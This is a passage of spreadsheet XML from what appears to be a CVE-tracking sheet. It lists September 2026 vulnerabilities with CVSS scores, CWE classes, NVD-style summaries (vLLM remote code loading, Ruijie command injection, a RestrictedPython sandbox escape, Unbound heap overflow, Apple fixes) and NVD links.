        <is>
          <t>CVE-2026-87030</t>
        </is>
      </c>
      <c r="D328" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E328" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F328" s="5" t="inlineStr">
        <is>
          <t>3938794e-25f5-4123-a1ba-5cbd7f104512</t>
        </is>
      </c>
      <c r="G328" s="5" t="inlineStr"/>
      <c r="H328" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I328" s="5" t="inlineStr"/>
      <c r="J328" s="5" t="inlineStr"/>
      <c r="K328" s="5" t="inlineStr">
        <is>
          <t>tanium:comply</t>
        </is>
      </c>
      <c r="L328" s="5" t="inlineStr"/>
      <c r="M328" s="5" t="inlineStr"/>
      <c r="N328" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O328" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P328" s="5" t="inlineStr"/>
      <c r="Q328" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R328" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed a path traversal vulnerability in Comply.</t>
        </is>
      </c>
      <c r="S328" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87030</t>
        </is>
      </c>
    </row>
    <row r="329">
      <c r="A329" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B329" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C329" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90553</t>
        </is>
      </c>
      <c r="D329" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E329" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F329" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G329" s="5" t="inlineStr"/>
      <c r="H329" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I329" s="5" t="inlineStr"/>
      <c r="J329" s="5" t="inlineStr"/>
      <c r="K329" s="5" t="inlineStr">
        <is>
          <t>vllm:vllm</t>
        </is>
      </c>
      <c r="L329" s="5" t="inlineStr"/>
      <c r="M329" s="5" t="inlineStr"/>
      <c r="N329" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O329" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="P329" s="5" t="inlineStr"/>
      <c r="Q329" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R329" s="5" t="inlineStr">
        <is>
          <t>vLLM before 0.28.0 contains a remote code execution vulnerability in the LlavaOnevision2 processor loader that ignores the trust_remote_code parameter when loading remote processor classes. Attackers can craft a malicious model with arbitrary code in processing_llava_onevision2.py that executes with vLLM process authority even when trust_remote_code is set to False.</t>
        </is>
      </c>
      <c r="S329" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90553</t>
        </is>
      </c>
    </row>
    <row r="330">
      <c r="A330" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B330" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C330" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92397</t>
        </is>
      </c>
      <c r="D330" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E330" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F330" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G330" s="5" t="inlineStr"/>
      <c r="H330" s="5" t="inlineStr"/>
      <c r="I330" s="5" t="inlineStr"/>
      <c r="J330" s="5" t="inlineStr"/>
      <c r="K330" s="5" t="inlineStr"/>
      <c r="L330" s="5" t="inlineStr"/>
      <c r="M330" s="5" t="inlineStr"/>
      <c r="N330" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O330" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P330" s="5" t="inlineStr"/>
      <c r="Q330" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-78</t>
        </is>
      </c>
      <c r="R330" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in Ruijie RG-EW3000GX EW_3.0(1)B11P380. Affected by this vulnerability is the function cc_set of the file unifyframe-sgi.elf of the component configChange. Such manipulation of the argument data.url leads to os command injection. The attack may be performed from remote. The exploit has been disclosed to the public and may be used.</t>
        </is>
      </c>
      <c r="S330" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92397</t>
        </is>
      </c>
    </row>
    <row r="331">
      <c r="A331" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B331" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C331" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92398</t>
        </is>
      </c>
      <c r="D331" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E331" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F331" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G331" s="5" t="inlineStr"/>
      <c r="H331" s="5" t="inlineStr"/>
      <c r="I331" s="5" t="inlineStr"/>
      <c r="J331" s="5" t="inlineStr"/>
      <c r="K331" s="5" t="inlineStr"/>
      <c r="L331" s="5" t="inlineStr"/>
      <c r="M331" s="5" t="inlineStr"/>
      <c r="N331" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O331" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P331" s="5" t="inlineStr"/>
      <c r="Q331" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-78</t>
        </is>
      </c>
      <c r="R331" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in Ruijie RG-EW3000GX EW_3.0(1)B11P380. Affected by this issue is some unknown functionality of the file /etc/rg_config/admin of the component user_list_note Module. Performing a manipulation of the argument Name results in os command injection. It is possible to initiate the attack remotely. The exploit has been made public and could be used.</t>
        </is>
      </c>
      <c r="S331" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92398</t>
        </is>
      </c>
    </row>
    <row r="332">
      <c r="A332" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B332" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C332" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20334</t>
        </is>
      </c>
      <c r="D332" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E332" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F332" s="5" t="inlineStr">
        <is>
          <t>psirt@cisco.com</t>
        </is>
      </c>
      <c r="G332" s="5" t="inlineStr"/>
      <c r="H332" s="5" t="inlineStr"/>
      <c r="I332" s="5" t="inlineStr"/>
      <c r="J332" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K332" s="5" t="inlineStr"/>
      <c r="L332" s="5" t="inlineStr"/>
      <c r="M332" s="5" t="inlineStr"/>
      <c r="N332" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O332" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P332" s="5" t="inlineStr"/>
      <c r="Q332" s="5" t="inlineStr">
        <is>
          <t>CWE-710</t>
        </is>
      </c>
      <c r="R332" s="5" t="inlineStr">
        <is>
          <t>As part of Cisco's ongoing commitment to proactive security and product quality, the Cisco Secure Adaptive Security Appliance Software, Cisco Secure Firewall Threat Defense Software and Cisco Secure Firewall Management Center Software engineering team has conducted a comprehensive internal security review. This review resulted in a software hardening release that addresses multiple internally discovered vulnerabilities.
The vulnerabilities tracked by CVE-2026-20334 are related to issues concerning improper adherence to coding standards that are grouped under the Common Weakness Enumeration (CWE) Pillar CWE-710.</t>
        </is>
      </c>
      <c r="S332" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20334</t>
        </is>
      </c>
    </row>
    <row r="333">
      <c r="A333" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B333" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C333" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-40857</t>
        </is>
      </c>
      <c r="D333" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E333" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F333" s="5" t="inlineStr">
        <is>
          <t>cvd@cert.pl</t>
        </is>
      </c>
      <c r="G333" s="5" t="inlineStr"/>
      <c r="H333" s="5" t="inlineStr"/>
      <c r="I333" s="5" t="inlineStr"/>
      <c r="J333" s="5" t="inlineStr"/>
      <c r="K333" s="5" t="inlineStr"/>
      <c r="L333" s="5" t="inlineStr"/>
      <c r="M333" s="5" t="inlineStr"/>
      <c r="N333" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O333" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P333" s="5" t="inlineStr"/>
      <c r="Q333" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="R333" s="5" t="inlineStr">
        <is>
          <t>WNC T-Mobile 5G Box IDU router contains a cross-site request forgery (CSRF) vulnerability in the portal.cgi component. The anti-CSRF mechanism fails to validate the csrf_token_value parameter, accepting any arbitrary value as valid. This allows a remote attacker to perform unauthorized actions on the device by tricking an authenticated user into visiting a malicious website.This issue has been fixed in firmware version 1.1.0.651412</t>
        </is>
      </c>
      <c r="S333" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-40857</t>
        </is>
      </c>
    </row>
    <row r="334">
      <c r="A334" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B334" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C334" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-4130</t>
        </is>
      </c>
      <c r="D334" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E334" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F334" s="5" t="inlineStr">
        <is>
          <t>security@ni.com</t>
        </is>
      </c>
      <c r="G334" s="5" t="inlineStr"/>
      <c r="H334" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I334" s="5" t="inlineStr"/>
      <c r="J334" s="5" t="inlineStr"/>
      <c r="K334" s="5" t="inlineStr"/>
      <c r="L334" s="5" t="inlineStr"/>
      <c r="M334" s="5" t="inlineStr"/>
      <c r="N334" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O334" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P334" s="5" t="inlineStr"/>
      <c r="Q334" s="5" t="inlineStr">
        <is>
          <t>CWE-312</t>
        </is>
      </c>
      <c r="R334" s="5" t="inlineStr">
        <is>
          <t>There is a storage of sensitive information in cleartext vulnerability in NI SystemLink. This vulnerability may allow an attacker with local access to obtain sensitive information stored by the system in the clear.  This vulnerability affects NI SystemLink and NI SystemLink Server versions prior to 2026 Q3.</t>
        </is>
      </c>
      <c r="S334" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-4130</t>
        </is>
      </c>
    </row>
    <row r="335">
      <c r="A335" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B335" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C335" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68955</t>
        </is>
      </c>
      <c r="D335" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E335" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F335" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G335" s="5" t="inlineStr"/>
      <c r="H335" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I335" s="5" t="inlineStr"/>
      <c r="J335" s="5" t="inlineStr"/>
      <c r="K335" s="5" t="inlineStr"/>
      <c r="L335" s="5" t="inlineStr"/>
      <c r="M335" s="5" t="inlineStr"/>
      <c r="N335" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O335" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P335" s="5" t="inlineStr"/>
      <c r="Q335" s="5" t="inlineStr">
        <is>
          <t>CWE-427</t>
        </is>
      </c>
      <c r="R335" s="5" t="inlineStr">
        <is>
          <t>The installer for Rakuten Kobo Desktop Application (Windows version) insecurely loads Dynamic Link Libraries. If there is a crafted DLL at the same directory when invoking the affected installer, arbitrary code may be executed with the privileges of the user who performed the installation.</t>
        </is>
      </c>
      <c r="S335" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68955</t>
        </is>
      </c>
    </row>
    <row r="336">
      <c r="A336" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B336" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C336" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76825</t>
        </is>
      </c>
      <c r="D336" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E336" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F336" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G336" s="5" t="inlineStr"/>
      <c r="H336" s="5" t="inlineStr"/>
      <c r="I336" s="5" t="inlineStr"/>
      <c r="J336" s="5" t="inlineStr"/>
      <c r="K336" s="5" t="inlineStr"/>
      <c r="L336" s="5" t="inlineStr"/>
      <c r="M336" s="5" t="inlineStr"/>
      <c r="N336" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O336" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P336" s="5" t="inlineStr"/>
      <c r="Q336" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-470, CWE-680, CWE-693</t>
        </is>
      </c>
      <c r="R336" s="5" t="inlineStr">
        <is>
          <t>RestrictedPython is a tool that helps define a subset of the Python language for accepting program input in a trusted environment. Prior to 8.4, RestrictedPython could allow a sandbox escape when a custom import policy or globals exposed the standard library string module, the string.Formatter class, a Formatter instance, or a Formatter subclass to restricted code. The string.Formatter methods format, get_field, get_value, and vformat performed attribute and item traversal internally without passing through RestrictedPython's safer_getattr protections. Restricted code could use those live object references to reach function globals, builtins, file access, or code execution primitives, affecting confidentiality, integrity, and availability in the host environment. This issue is fixed in version 8.4.</t>
        </is>
      </c>
      <c r="S336" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76825</t>
        </is>
      </c>
    </row>
    <row r="337">
      <c r="A337" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B337" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C337" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82049</t>
        </is>
      </c>
      <c r="D337" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E337" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F337" s="5" t="inlineStr">
        <is>
          <t>cna@python.org</t>
        </is>
      </c>
      <c r="G337" s="5" t="inlineStr"/>
      <c r="H337" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I337" s="5" t="inlineStr"/>
      <c r="J337" s="5" t="inlineStr"/>
      <c r="K337" s="5" t="inlineStr"/>
      <c r="L337" s="5" t="inlineStr"/>
      <c r="M337" s="5" t="inlineStr"/>
      <c r="N337" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O337" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P337" s="5" t="inlineStr"/>
      <c r="Q337" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="R337" s="5" t="inlineStr">
        <is>
          <t>In CPython 3.13 and earlier, the tarfile module's data and tar extraction filters are vulnerable to crafted archives containing a hard link to a symbolic link. Such archives may cause extraction to modify the permissions or modification time of a file outside the destination directory, or expose the contents of that file within the extracted tree.</t>
        </is>
      </c>
      <c r="S337" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82049</t>
        </is>
      </c>
    </row>
    <row r="338">
      <c r="A338" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B338" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C338" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82717</t>
        </is>
      </c>
      <c r="D338" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E338" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F338" s="5" t="inlineStr">
        <is>
          <t>sep@nlnetlabs.nl</t>
        </is>
      </c>
      <c r="G338" s="5" t="inlineStr"/>
      <c r="H338" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I338" s="5" t="inlineStr"/>
      <c r="J338" s="5" t="inlineStr"/>
      <c r="K338" s="5" t="inlineStr"/>
      <c r="L338" s="5" t="inlineStr"/>
      <c r="M338" s="5" t="inlineStr"/>
      <c r="N338" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O338" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P338" s="5" t="inlineStr"/>
      <c r="Q338" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R338" s="5" t="inlineStr">
        <is>
          <t>In NLnet Labs Unbound up to and including 1.26.0, a vulnerability was found in that can progressively corrupt heap memory and under certain systems and compilation options could lead to remote code execution. The vulnerability starts when CNAME synthesis during an upstream response needs to enforce(rewrite) a max TTL value in the packet buffer. Coupled with a compression pointer that points to the overwritten value and invalidates the domain name, it leads to an error path that does not properly move the buffer position and allows for the heap buffer overflow. Since this is heavily reliant on heap memory layout, results are memory corruption that eventually leads to a crash and under specific systems and compilation options remote code execution.</t>
        </is>
      </c>
      <c r="S338" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82717</t>
        </is>
      </c>
    </row>
    <row r="339">
      <c r="A339" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B339" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C339" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84546</t>
        </is>
      </c>
      <c r="D339" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E339" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F339" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G339" s="5" t="inlineStr"/>
      <c r="H339" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I339" s="5" t="inlineStr"/>
      <c r="J339" s="5" t="inlineStr"/>
      <c r="K339" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os, apple:macos, apple:tvos, apple:visionos, apple:watchos</t>
        </is>
      </c>
      <c r="L339" s="5" t="inlineStr"/>
      <c r="M339" s="5" t="inlineStr"/>
      <c r="N339" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O339" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P339" s="5" t="inlineStr"/>
      <c r="Q339" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R339" s="5" t="inlineStr">
        <is>
          <t>An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 26.7 and iPadOS 26.7, iOS 27 and iPadOS 27, macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7, tvOS 27, visionOS 27, watchOS 27. Processing a maliciously crafted 3D model may lead to memory corruption.</t>
        </is>
      </c>
      <c r="S339" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84546</t>
        </is>
      </c>
    </row>
    <row r="340">
      <c r="A340" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B340" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C340" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84580</t>
        </is>
      </c>
      <c r="D340" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E340" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F340" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G340" s="5" t="inlineStr"/>
      <c r="H340" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I340" s="5" t="inlineStr"/>
      <c r="J340" s="5" t="inlineStr"/>
      <c r="K340" s="5" t="inlineStr">
        <is>
          <t>apple:macos</t>
        </is>
      </c>
      <c r="L340" s="5" t="inlineStr"/>
      <c r="M340" s="5" t="inlineStr"/>
      <c r="N340" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O340" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P340" s="5" t="inlineStr"/>
      <c r="Q340" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R340" s="5" t="inlineStr">
        <is>
          <t>The issue was addressed with improved checks. This issue is fixed in macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7. An app may be able to break out of its sandbox.</t>
        </is>
      </c>
      <c r="S340" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84580</t>
        </is>
      </c>
    </row>
    <row r="341">
      <c r="A341" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B341" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C341" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84581</t>
        </is>
      </c>
      <c r="D341" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E341" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F341" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G341" s="5" t="inlineStr"/>
      <c r="H341" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I341" s="5" t="inlineStr"/>
      <c r="J341" s="5" t="inlineStr"/>
      <c r="K341" s="5" t="inlineStr">
        <is>
          <t>apple:macos</t>
        </is>
      </c>
      <c r="L341" s="5" t="inlineStr"/>
      <c r="M341" s="5" t="inlineStr"/>
      <c r="N341" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O341" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P341" s="5" t="inlineStr"/>
      <c r="Q341" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="R341" s="5" t="inlineStr">
        <is>
          <t>A buffer overflow was addressed with improved bounds checking. This issue is fixed in macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7. Mounting a maliciously crafted disk image may cause unexpected system termination or corrupt kernel memory.</t>
        </is>
      </c>
      <c r="S341" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84581</t>
        </is>
      </c>
    </row>
    <row r="342">
      <c r="A342" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B342" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C342" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84584</t>
        </is>
      </c>
      <c r="D342" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E342" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F342" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G342" s="5" t="inlineStr"/>
      <c r="H342" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I342" s="5" t="inlineStr"/>
      <c r="J342" s="5" t="inlineStr"/>
      <c r="K342" s="5" t="inlineStr">
        <is>
          <t>apple:macos</t>
        </is>
      </c>
      <c r="L342" s="5" t="inlineStr"/>
      <c r="M342" s="5" t="inlineStr"/>
      <c r="N342" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O342" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P342" s="5" t="inlineStr"/>
      <c r="Q342" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="R342" s="5" t="inlineStr">
        <is>
          <t>This issue was addressed with improved handling of symlinks. This issue is fixed in macOS Golden Gate 27. An app may be able to break out of its sandbox.</t>
        </is>
      </c>
      <c r="S342" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84584</t>
        </is>
      </c>
    </row>
    <row r="343">
      <c r="A343" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B343" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C343" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85616</t>
        </is>
      </c>
      <c r="D343" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E343" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F343" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G343" s="5" t="inlineStr"/>
      <c r="H343" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I343" s="5" t="inlineStr"/>
      <c r="J343" s="5" t="inlineStr"/>
      <c r="K343" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L343" s="5" t="inlineStr"/>
      <c r="M343" s="5" t="inlineStr"/>
      <c r="N343" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O343" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P343" s="5" t="inlineStr"/>
      <c r="Q343" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R343" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT versions before 8.6.2 contain an authorization bypass vulnerability in checkout-acceptance report actions when Full Multiple Company Support is enabled. Authenticated users with reports.view permission can enumerate sequential acceptance IDs and soft-delete or trigger reminder emails for acceptances belonging to other companies by exploiting a null check on the legacy users.company_id column.</t>
        </is>
      </c>
      <c r="S343" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85616</t>
        </is>
      </c>
    </row>
    <row r="344">
      <c r="A344" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B344" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C344" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86836</t>
        </is>
      </c>
      <c r="D344" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E344" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F344" s="5" t="inlineStr">
        <is>
          <t>emo@eclipse.org</t>
        </is>
      </c>
      <c r="G344" s="5" t="inlineStr"/>
      <c r="H344" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I344" s="5" t="inlineStr"/>
      <c r="J344" s="5" t="inlineStr"/>
      <c r="K344" s="5" t="inlineStr"/>
      <c r="L344" s="5" t="inlineStr"/>
      <c r="M344" s="5" t="inlineStr"/>
      <c r="N344" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O344" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P344" s="5" t="inlineStr"/>
      <c r="Q344" s="5" t="inlineStr">
        <is>
          <t>CWE-276, CWE-367, CWE-379</t>
        </is>
      </c>
      <c r="R344" s="5" t="inlineStr">
        <is>
